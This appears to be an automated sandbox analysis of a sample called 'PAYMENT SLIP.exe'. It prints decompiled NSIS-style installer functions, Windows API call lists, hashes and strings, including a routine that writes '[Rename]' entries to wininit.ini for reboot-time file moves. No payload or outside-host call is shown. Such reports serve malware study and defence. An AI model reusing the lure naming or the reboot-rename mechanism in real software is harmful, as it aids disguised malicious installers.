              • Instruction Fuzzy Hash: 17C1B1B1600604FBCB216F61EE85E2A7BB8EB84705F40497EF741B51F1CB3958529B2E
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 91%
              			E00404651(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
              				intOrPtr _v8;
              				int _v12;
              				void* _v16;
              				struct HWND__* _t56;
              				signed int _t75;
              				signed short* _t76;
              				signed short* _t78;
              				long _t92;
              				int _t103;
              				signed int _t110;
              				intOrPtr _t113;
              				WCHAR* _t114;
              				signed int* _t116;
              				WCHAR* _t117;
              				struct HWND__* _t118;
              
              				if(_a8 != 0x110) {
              					if(_a8 != 0x111) {
              						L13:
              						if(_a8 != 0x4e) {
              							if(_a8 == 0x40b) {
              								 *0x421714 =  *0x421714 + 1;
              							}
              							L27:
              							_t114 = _a16;
              							L28:
              							return E004044F9(_a8, _a12, _t114);
              						}
              						_t56 = GetDlgItem(_a4, 0x3e8);
              						_t114 = _a16;
              						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
              							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
              							_t113 =  *((intOrPtr*)(_t114 + 0x18));
              							_v12 = _t103;
              							_v16 = _t113;
              							_v8 = 0x428200;
              							if(_t103 - _t113 < 0x800) {
              								SendMessageW(_t56, 0x44b, 0,  &_v16);
              								SetCursor(LoadCursorW(0, 0x7f02));
              								_push(1);
              								E00404900(_a4, _v8);
              								SetCursor(LoadCursorW(0, 0x7f00));
              								_t114 = _a16;
              							}
              						}
              						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
              							goto L28;
              						} else {
              							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
              								SendMessageW( *0x42a268, 0x111, 1, 0);
              							}
              							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
              								SendMessageW( *0x42a268, 0x10, 0, 0);
              							}
              							return 1;
              						}
              					}
              					if(_a12 >> 0x10 != 0 ||  *0x421714 != 0) {
              						goto L27;
              					} else {
              						_t116 =  *0x422720 + 0x14;
              						if(( *_t116 & 0x00000020) == 0) {
              							goto L27;
              						}
              						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
              						E004044B4(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
              						E004048DC();
              						goto L13;
              					}
              				}
              				_t117 = _a16;
              				_t75 =  *(_t117 + 0x30);
              				if(_t75 < 0) {
              					_t75 =  *( *0x42923c - 4 + _t75 * 4);
              				}
              				_t76 =  *0x42a2b8 + _t75 * 2;
              				_t110 =  *_t76 & 0x0000ffff;
              				_a8 = _t110;
              				_t78 =  &(_t76[1]);
              				_a16 = _t78;
              				_v16 = _t78;
              				_v12 = 0;
              				_v8 = E00404602;
              				if(_t110 != 2) {
              					_v8 = E004045C8;
              				}
              				_push( *((intOrPtr*)(_t117 + 0x34)));
              				_push(0x22);
              				E00404492(_a4);
              				_push( *((intOrPtr*)(_t117 + 0x38)));
              				_push(0x23);
              				E00404492(_a4);
              				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
              				E004044B4( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
              				_t118 = GetDlgItem(_a4, 0x3e8);
              				E004044C7(_t118);
              				SendMessageW(_t118, 0x45b, 1, 0);
              				_t92 =  *( *0x42a274 + 0x68);
              				if(_t92 < 0) {
              					_t92 = GetSysColor( ~_t92);
              				}
              				SendMessageW(_t118, 0x443, 0, _t92);
              				SendMessageW(_t118, 0x445, 0, 0x4010000);
              				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
              				 *0x421714 = 0;
              				SendMessageW(_t118, 0x449, _a8,  &_v16);
              				 *0x421714 = 0;
              				return 0;
              			}



















              APIs
              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046EF
              • GetDlgItem.USER32 ref: 00404703
              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404720
              • GetSysColor.USER32(?), ref: 00404731
              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040473F
              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040474D
              • lstrlenW.KERNEL32(?), ref: 00404752
              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040475F
              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404774
              • GetDlgItem.USER32 ref: 004047CD
              • SendMessageW.USER32(00000000), ref: 004047D4
              • GetDlgItem.USER32 ref: 004047FF
              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404842
              • LoadCursorW.USER32(00000000,00007F02), ref: 00404850
              • SetCursor.USER32(00000000), ref: 00404853
              • LoadCursorW.USER32(00000000,00007F00), ref: 0040486C
              • SetCursor.USER32(00000000), ref: 0040486F
              • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040489E
              • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B0
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
              • String ID: KXCJDFJSKF$N
              • API String ID: 3103080414-3315232752
              • Opcode ID: 109bfc3f4ae54697b435cbc64e06ea45ef072446bfa87c0e9d4d0ff38833786b
              • Instruction ID: 9740ae806e86bdd9a5d1823962a5ed5927fd13c96e858ba55e5d087808badbab
              • Opcode Fuzzy Hash: 109bfc3f4ae54697b435cbc64e06ea45ef072446bfa87c0e9d4d0ff38833786b
              • Instruction Fuzzy Hash: EE6193B1900209FFDB10AF60DD85E6A7B69FB84314F00853AFA05B62D1D7789D51CF98
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00406188(void* __ecx) {
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				long _t12;
              				long _t24;
              				char* _t31;
              				int _t37;
              				void* _t38;
              				intOrPtr* _t39;
              				long _t42;
              				WCHAR* _t44;
              				void* _t46;
              				void* _t48;
              				void* _t49;
              				void* _t52;
              				void* _t53;
              
              				_t38 = __ecx;
              				_t44 =  *(_t52 + 0x14);
              				 *0x426de8 = 0x55004e;
              				 *0x426dec = 0x4c;
              				if(_t44 == 0) {
              					L3:
              					_t2 = _t52 + 0x1c; // 0x4275e8
              					_t12 = GetShortPathNameW( *_t2, 0x4275e8, 0x400);
              					if(_t12 != 0 && _t12 <= 0x400) {
              						_t37 = wsprintfA(0x4269e8, "%ls=%ls\r\n", 0x426de8, 0x4275e8);
              						_t53 = _t52 + 0x10;
              						E00406579(_t37, 0x400, 0x4275e8, 0x4275e8,  *((intOrPtr*)( *0x42a274 + 0x128)));
              						_t12 = E00406032(0x4275e8, 0xc0000000, 4);
              						_t48 = _t12;
              						 *(_t53 + 0x18) = _t48;
              						if(_t48 != 0xffffffff) {
              							_t42 = GetFileSize(_t48, 0);
              							_t6 = _t37 + 0xa; // 0xa
              							_t46 = GlobalAlloc(0x40, _t42 + _t6);
              							if(_t46 == 0 || E004060B5(_t48, _t46, _t42) == 0) {
              								L18:
              								return CloseHandle(_t48);
              							} else {
              								if(E00405F97(_t38, _t46, "[Rename]\r\n") != 0) {
              									_t49 = E00405F97(_t38, _t21 + 0xa, "\n[");
              									if(_t49 == 0) {
              										_t48 =  *(_t53 + 0x18);
              										L16:
              										_t24 = _t42;
              										L17:
              										E00405FED(_t24 + _t46, 0x4269e8, _t37);
              										SetFilePointer(_t48, 0, 0, 0);
              										E004060E4(_t48, _t46, _t42 + _t37);
              										GlobalFree(_t46);
              										goto L18;
              									}
              									_t39 = _t46 + _t42;
              									_t31 = _t39 + _t37;
              									while(_t39 > _t49) {
              										 *_t31 =  *_t39;
              										_t31 = _t31 - 1;
              										_t39 = _t39 - 1;
              									}
              									_t24 = _t49 - _t46 + 1;
              									_t48 =  *(_t53 + 0x18);
              									goto L17;
              								}
              								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
              								_t42 = _t42 + 0xa;
              								goto L16;
              							}
              						}
              					}
              				} else {
              					CloseHandle(E00406032(_t44, 0, 1));
              					_t12 = GetShortPathNameW(_t44, 0x426de8, 0x400);
              					if(_t12 != 0 && _t12 <= 0x400) {
              						goto L3;
              					}
              				}
              				return _t12;
              			}




















              APIs
              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406323,?,?), ref: 004061C3
              • GetShortPathNameW.KERNEL32 ref: 004061CC
                • Part of subcall function 00405F97: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA7
                • Part of subcall function 00405F97: lstrlenA.KERNEL32(00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD9
              • GetShortPathNameW.KERNEL32 ref: 004061E9
              • wsprintfA.USER32 ref: 00406207
              • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406242
              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406251
              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406289
              • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 004062DF
              • GlobalFree.KERNEL32 ref: 004062F0
              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F7
                • Part of subcall function 00406032: GetFileAttributesW.KERNELBASE(00000003,004030AB,C:\Users\user\Desktop\PAYMENT SLIP.exe,80000000,00000003), ref: 00406036
                • Part of subcall function 00406032: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406058
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
              • String ID: %ls=%ls$[Rename]$mB$uB$uB
              • API String ID: 2171350718-2295842750
              • Opcode ID: 1370db5916d635a3eaa8287a3a8568cfa6b7ad2c16bbfcffe5a040e030d3314f
              • Instruction ID: 390cd084817c4cf50855a9647c10840f2cfe6cacc919d204b2e4a530669b52c0
              • Opcode Fuzzy Hash: 1370db5916d635a3eaa8287a3a8568cfa6b7ad2c16bbfcffe5a040e030d3314f
              • Instruction Fuzzy Hash: FB312231200715BBC2207B659E49F5B3A9CEF41754F16007FBA42F62C2EA3CD82586BD
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 90%
              			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
              				struct tagLOGBRUSH _v16;
              				struct tagRECT _v32;
              				struct tagPAINTSTRUCT _v96;
              				struct HDC__* _t70;
              				struct HBRUSH__* _t87;
              				struct HFONT__* _t94;
              				long _t102;
              				signed int _t126;
              				struct HDC__* _t128;
              				intOrPtr _t130;
              
              				if(_a8 == 0xf) {
              					_t130 =  *0x42a274;
              					_t70 = BeginPaint(_a4,  &_v96);
              					_v16.lbStyle = _v16.lbStyle & 0x00000000;
              					_a8 = _t70;
              					GetClientRect(_a4,  &_v32);
              					_t126 = _v32.bottom;
              					_v32.bottom = _v32.bottom & 0x00000000;
              					while(_v32.top < _t126) {
              						_a12 = _t126 - _v32.top;
              						asm("cdq");
              						asm("cdq");
              						asm("cdq");
              						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
              						_t87 = CreateBrushIndirect( &_v16);
              						_v32.bottom = _v32.bottom + 4;
              						_a16 = _t87;
              						FillRect(_a8,  &_v32, _t87);
              						DeleteObject(_a16);
              						_v32.top = _v32.top + 4;
              					}
              					if( *(_t130 + 0x58) != 0xffffffff) {
              						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
              						_a16 = _t94;
              						if(_t94 != 0) {
              							_t128 = _a8;
              							_v32.left = 0x10;
              							_v32.top = 8;
              							SetBkMode(_t128, 1);
              							SetTextColor(_t128,  *(_t130 + 0x58));
              							_a8 = SelectObject(_t128, _a16);
              							DrawTextW(_t128, 0x429260, 0xffffffff,  &_v32, 0x820);
              							SelectObject(_t128, _a8);
              							DeleteObject(_a16);
              						}
              					}
              					EndPaint(_a4,  &_v96);
              					return 0;
              				}
              				_t102 = _a16;
              				if(_a8 == 0x46) {
              					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
              					 *((intOrPtr*)(_t102 + 4)) =  *0x42a268;
              				}
              				return DefWindowProcW(_a4, _a8, _a12, _t102);
              			}














              APIs
              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
              • BeginPaint.USER32(?,?), ref: 00401047
              • GetClientRect.USER32 ref: 0040105B
              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
              • FillRect.USER32 ref: 004010E4
              • DeleteObject.GDI32(?), ref: 004010ED
              • CreateFontIndirectW.GDI32(?), ref: 00401105
              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
              • SelectObject.GDI32(00000000,?), ref: 00401140
              • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
              • SelectObject.GDI32(00000000,00000000), ref: 00401160
              • DeleteObject.GDI32(?), ref: 00401165
              • EndPaint.USER32(?,?), ref: 0040116E
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
              • String ID: F
              • API String ID: 941294808-1304234792
              • Opcode ID: dccf31a386450978f6a467bb1a2dd48e69ee6b81a70d351153b8e89f54c6a922
              • Instruction ID: 0f43a076eda42f240989ba3bcaaa7122e90b548761b3bfdbbaf4c3cca9648f62
              • Opcode Fuzzy Hash: dccf31a386450978f6a467bb1a2dd48e69ee6b81a70d351153b8e89f54c6a922
              • Instruction Fuzzy Hash: CF418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7389A55DFA4
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 72%
              			E00406579(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
              				signed int _v8;
              				struct _ITEMIDLIST* _v12;
              				signed int _v16;
              				signed int _v20;
              				signed int _v24;
              				signed int _v28;
              				signed int _t43;
              				WCHAR* _t44;
              				signed char _t46;
              				signed int _t47;
              				signed int _t48;
              				short _t58;
              				short _t60;
              				short _t62;
              				void* _t70;
              				signed int _t76;
              				void* _t82;
              				signed char _t83;
              				short _t86;
              				signed int _t96;
              				void* _t102;
              				short _t103;
              				signed int _t106;
              				signed int _t108;
              				void* _t109;
              				WCHAR* _t110;
              				void* _t112;
              
              				_t109 = __esi;
              				_t102 = __edi;
              				_t70 = __ebx;
              				_t43 = _a8;
              				if(_t43 < 0) {
              					_t43 =  *( *0x42923c - 4 + _t43 * 4);
              				}
              				_push(_t70);
              				_push(_t109);
              				_push(_t102);
              				_t96 =  *0x42a2b8 + _t43 * 2;
              				_t44 = 0x428200;
              				_t110 = 0x428200;
              				if(_a4 >= 0x428200 && _a4 - 0x428200 >> 1 < 0x800) {
              					_t110 = _a4;
              					_a4 = _a4 & 0x00000000;
              				}
              				while(1) {
              					_t103 =  *_t96;
              					if(_t103 == 0) {
              						break;
              					}
              					__eflags = (_t110 - _t44 & 0xfffffffe) - 0x800;
              					if((_t110 - _t44 & 0xfffffffe) >= 0x800) {
              						break;
              					}
              					_t82 = 2;
              					_t96 = _t96 + _t82;
              					__eflags = _t103 - 4;
              					_a8 = _t96;
              					if(__eflags >= 0) {
              						if(__eflags != 0) {
              							 *_t110 = _t103;
              							_t110 = _t110 + _t82;
              							__eflags = _t110;
              						} else {
              							 *_t110 =  *_t96;
              							_t110 = _t110 + _t82;
              							_t96 = _t96 + _t82;
              						}
              						continue;
              					}
              					_t83 =  *((intOrPtr*)(_t96 + 1));
              					_t46 =  *_t96;
              					_t47 = _t46 & 0x000000ff;
              					_v8 = (_t83 & 0x0000007f) << 0x00000007 | _t46 & 0x0000007f;
              					_a8 = _a8 + 2;
              					_v28 = _t47 | 0x00008000;
              					_v24 = _t47;
              					_t76 = _t83 & 0x000000ff;
              					_v16 = _t76;
              					__eflags = _t103 - 2;
              					_v20 = _t76 | 0x00008000;
              					if(_t103 != 2) {
              						__eflags = _t103 - 3;
              						if(_t103 != 3) {
              							__eflags = _t103 - 1;
              							if(_t103 == 1) {
              								__eflags = (_t47 | 0xffffffff) - _v8;
              								E00406579(_t76, _t103, _t110, _t110, (_t47 | 0xffffffff) - _v8);
              							}
              							L43:
              							_t48 = lstrlenW(_t110);
              							_t96 = _a8;
              							_t110 =  &(_t110[_t48]);
              							_t44 = 0x428200;
              							continue;
              						}
              						_t106 = _v8;
              						__eflags = _t106 - 0x1d;
              						if(_t106 != 0x1d) {
              							__eflags = (_t106 << 0xb) + 0x42b000;
              							E0040653C(_t110, (_t106 << 0xb) + 0x42b000);
              						} else {
              							E00406483(_t110,  *0x42a268);
              						}
              						__eflags = _t106 + 0xffffffeb - 7;
              						if(_t106 + 0xffffffeb < 7) {
              							L34:
              							E004067EB(_t110);
              						}
              						goto L43;
              					}
              					_t86 =  *0x42a26c;
              					__eflags = _t86;
              					_t108 = 2;
              					if(_t86 >= 0) {
              						L13:
              						_v8 = 1;
              						L14:
              						__eflags =  *0x42a304;
              						if( *0x42a304 != 0) {
              							_t108 = 4;
              						}
              						__eflags = _t47;
              						if(__eflags >= 0) {
              							__eflags = _t47 - 0x25;
              							if(_t47 != 0x25) {
              								__eflags = _t47 - 0x24;
              								if(_t47 == 0x24) {
              									GetWindowsDirectoryW(_t110, 0x400);
              									_t108 = 0;
              								}
              								while(1) {
              									__eflags = _t108;
              									if(_t108 == 0) {
              										goto L30;
              									}
              									_t58 =  *0x42a264;
              									_t108 = _t108 - 1;
              									__eflags = _t58;
              									if(_t58 == 0) {
              										L26:
              										_t60 = SHGetSpecialFolderLocation( *0x42a268,  *(_t112 + _t108 * 4 - 0x18),  &_v12);
              										__eflags = _t60;
              										if(_t60 != 0) {
              											L28:
              											 *_t110 =  *_t110 & 0x00000000;
              											__eflags =  *_t110;
              											continue;
              										}
              										__imp__SHGetPathFromIDListW(_v12, _t110);
              										__imp__CoTaskMemFree(_v12);
              										__eflags = _t60;
              										if(_t60 != 0) {
              											goto L30;
              										}
              										goto L28;
              									}
              									__eflags = _v8;
              									if(_v8 == 0) {
              										goto L26;
              									}
              									_t62 =  *_t58( *0x42a268,  *(_t112 + _t108 * 4 - 0x18), 0, 0, _t110);
              									__eflags = _t62;
              									if(_t62 == 0) {
              										goto L30;
              									}
              									goto L26;
              								}
              								goto L30;
              							}
              							GetSystemDirectoryW(_t110, 0x400);
              							goto L30;
              						} else {
              							E0040640A( *0x42a2b8, __eflags, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a2b8 + (_t47 & 0x0000003f) * 2, _t110, _t47 & 0x00000040);
              							__eflags =  *_t110;
              							if( *_t110 != 0) {
              								L32:
              								__eflags = _t76 - 0x1a;
              								if(_t76 == 0x1a) {
              									lstrcatW(_t110, L"\\Microsoft\\Internet Explorer\\Quick Launch");
              								}
              								goto L34;
              							}
              							E00406579(_t76, _t108, _t110, _t110, _t76);
              							L30:
              							__eflags =  *_t110;
              							if( *_t110 == 0) {
              								goto L34;
              							}
              							_t76 = _v16;
              							goto L32;
              						}
              					}
              					__eflags = _t86 - 0x5a04;
              					if(_t86 == 0x5a04) {
              						goto L13;
              					}
              					__eflags = _t76 - 0x23;
              					if(_t76 == 0x23) {
              						goto L13;
              					}
              					__eflags = _t76 - 0x2e;
              					if(_t76 == 0x2e) {
              						goto L13;
              					} else {
              						_v8 = _v8 & 0x00000000;
              						goto L14;
              					}
              				}
              				 *_t110 =  *_t110 & 0x00000000;
              				if(_a4 == 0) {
              					return _t44;
              				}
              				return E0040653C(_a4, _t44);
              			}

              APIs
              • GetSystemDirectoryW.KERNEL32(KXCJDFJSKF,00000400), ref: 004066BA
              • GetWindowsDirectoryW.KERNEL32(KXCJDFJSKF,00000400,00000000,00422728,?,004055DB,00422728,00000000), ref: 004066CD
              • SHGetSpecialFolderLocation.SHELL32(004055DB,00000000,00000000,00422728,?,004055DB,00422728,00000000), ref: 00406709
              • SHGetPathFromIDListW.SHELL32(00000000,KXCJDFJSKF), ref: 00406717
              • CoTaskMemFree.OLE32(00000000), ref: 00406722
              • lstrcatW.KERNEL32(KXCJDFJSKF,\Microsoft\Internet Explorer\Quick Launch), ref: 00406748
              • lstrlenW.KERNEL32(KXCJDFJSKF,00000000,00422728,?,004055DB,00422728,00000000), ref: 004067A0
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
              • String ID: KXCJDFJSKF$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
              • API String ID: 717251189-2443651505
              • Opcode ID: 461394275e41b2543b5fd82fcf6b9832f1e7dc77c54885fbf13ec40e6163d1f3
              • Instruction ID: 6f5f2b99d90c7511299ba9a64344c15edde84ad84532d0df03b232db96096e81
              • Opcode Fuzzy Hash: 461394275e41b2543b5fd82fcf6b9832f1e7dc77c54885fbf13ec40e6163d1f3
              • Instruction Fuzzy Hash: BA613671601111ABDF209F14DD80AAE37A5AF10718F52403FE943B72D0DB3E5AA6CB5D
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E004055A4(signed int _a4, WCHAR* _a8) {
              				struct HWND__* _v8;
              				signed int _v12;
              				WCHAR* _v32;
              				long _v44;
              				int _v48;
              				void* _v52;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				WCHAR* _t27;
              				signed int _t28;
              				long _t29;
              				signed int _t37;
              				signed int _t38;
              
              				_t27 =  *0x429244;
              				_v8 = _t27;
              				if(_t27 != 0) {
              					_t37 =  *0x42a334;
              					_v12 = _t37;
              					_t38 = _t37 & 0x00000001;
              					if(_t38 == 0) {
              						E00406579(_t38, 0, 0x422728, 0x422728, _a4);
              					}
              					_t27 = lstrlenW(0x422728);
              					_a4 = _t27;
              					if(_a8 == 0) {
              						L6:
              						if((_v12 & 0x00000004) == 0) {
              							_t27 = SetWindowTextW( *0x429228, 0x422728);
              						}
              						if((_v12 & 0x00000002) == 0) {
              							_v32 = 0x422728;
              							_v52 = 1;
              							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
              							_v44 = 0;
              							_v48 = _t29 - _t38;
              							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
              							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
              						}
              						if(_t38 != 0) {
              							_t28 = _a4;
              							0x422728[_t28] = 0;
              							return _t28;
              						}
              					} else {
              						_t27 = lstrlenW(_a8) + _a4;
              						if(_t27 < 0x1000) {
              							_t27 = lstrcatW(0x422728, _a8);
              							goto L6;
              						}
              					}
              				}
              				return _t27;
              			}

              APIs
              • lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000,?), ref: 004055DC
              • lstrlenW.KERNEL32(00403040,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000), ref: 004055EC
              • lstrcatW.KERNEL32(00422728,00403040), ref: 004055FF
              • SetWindowTextW.USER32(00422728,00422728), ref: 00405611
              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405637
              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405651
              • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565F
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID: MessageSend$lstrlen$TextWindowlstrcat
              • String ID: ('B
              • API String ID: 2531174081-2332581011
              • Opcode ID: 8d4ec48a8783ac7c02cf808f938a66a70b9f0af433ef19620f9c759a8ff7b601
              • Instruction ID: cea8892cb4e31635aa5f40387e4ea582d2b984c796fabda61e5f1d3d18a4122e
              • Opcode Fuzzy Hash: 8d4ec48a8783ac7c02cf808f938a66a70b9f0af433ef19620f9c759a8ff7b601
              • Instruction Fuzzy Hash: E6218E71900518BACB119F65DD44ECFBFB9EF45360F54443AF904B62A0C77A4A508FA8
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 91%
              			E004067EB(WCHAR* _a4) {
              				short _t5;
              				short _t7;
              				WCHAR* _t19;
              				WCHAR* _t20;
              				WCHAR* _t21;
              
              				_t20 = _a4;
              				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
              					_t20 =  &(_t20[4]);
              				}
              				if( *_t20 != 0 && E00405E88(_t20) != 0) {
              					_t20 =  &(_t20[2]);
              				}
              				_t5 =  *_t20;
              				_t21 = _t20;
              				_t19 = _t20;
              				if(_t5 != 0) {
              					do {
              						if(_t5 > 0x1f &&  *((short*)(E00405E3E(L"*?|<>/\":", _t5))) == 0) {
              							E00405FED(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
              							_t19 = CharNextW(_t19);
              						}
              						_t20 = CharNextW(_t20);
              						_t5 =  *_t20;
              					} while (_t5 != 0);
              				}
              				 *_t19 =  *_t19 & 0x00000000;
              				while(1) {
              					_push(_t19);
              					_push(_t21);
              					_t19 = CharPrevW();
              					_t7 =  *_t19;
              					if(_t7 != 0x20 && _t7 != 0x5c) {
              						break;
              					}
              					 *_t19 =  *_t19 & 0x00000000;
              					if(_t21 < _t19) {
              						continue;
              					}
              					break;
              				}
              				return _t7;
              			}

              APIs
              • CharNextW.USER32(?,*?|<>/":,00000000,00000000,73BCFAA0,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PAYMENT SLIP.exe" ,004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 0040684E
              • CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040685D
              • CharNextW.USER32(?,00000000,73BCFAA0,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PAYMENT SLIP.exe" ,004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00406862
              • CharPrevW.USER32(?,?,73BCFAA0,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PAYMENT SLIP.exe" ,004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00406875
              Strings
              • C:\Users\user\AppData\Local\Temp\, xrefs: 004067EC
              • *?|<>/":, xrefs: 0040683D
